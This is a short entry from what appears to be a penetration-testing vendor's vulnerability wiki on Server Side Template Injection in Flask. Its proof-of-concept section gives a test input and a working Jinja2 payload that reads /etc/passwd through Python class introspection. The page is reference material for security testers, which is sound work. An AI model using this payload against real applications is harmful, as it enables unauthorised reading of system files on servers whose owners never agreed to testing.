Cobalt Vulnerability Wiki
Cobalt Vulnerability Wiki
Categories
V2 - AuthenticationV3 - Session ManagementV4 - Access ControlV5 - Validation/Sanitization Blind SQL injectionClickjackingCommand Injection Cookie-Based XSS Cross Site Script Inclusion (XSSI)CSRF/URL-Based XSS CSS injectionCSV Injection DOM-Based XSSFlash-Based XSS HTML injection HTTP Parameter Pollution to XSS HTTP Request Smuggling HTTP Response Splitting (CRLF)iframe InjectionLDAP injection Local File InclusionOOB (Out of Band) XXEOpen Redirect Reflected File Download (RFD) Reflected Self-XSSReflected XSS Reflected XSS - WAF bypassRemote Code ExecutionRemote File InclusionRosetta FlashServer Side Template InjectionServer Side Template Injection (SSTI) in Flask SQL Injection SSI InjectionSSRF Stored XSSTabnabbing TRACE Method XSS - Cross-Site Tracing (XST) Universal (UXSS) XSS WAF Bypass XSS via RefererXXE
V6 - CryptographyV7 - Error LoggingV8 - Data ProtectionV9 - CommunicationsV10 - Malicious CodeV11 - Business LogicV12 - Files ResourcesV13 - APIV14 - ConfigV5 - Validation/Sanitization
Server Side Template Injection (SSTI) in Flask
POC
Write the following input and observe that “test{{4-1}}” is interpreted as test3
Try to read internal files with the following payload:
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
For more information and techniques:
https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti
https://nvisium.com/blog/2015/12/07/injecting-flask.html
Impact
Low-Medium-High (depends on the attack)
Likelihood
Low-Medium-High (depends on the attack)
Ready to get started?
Join some of these great clients we're proud to have helped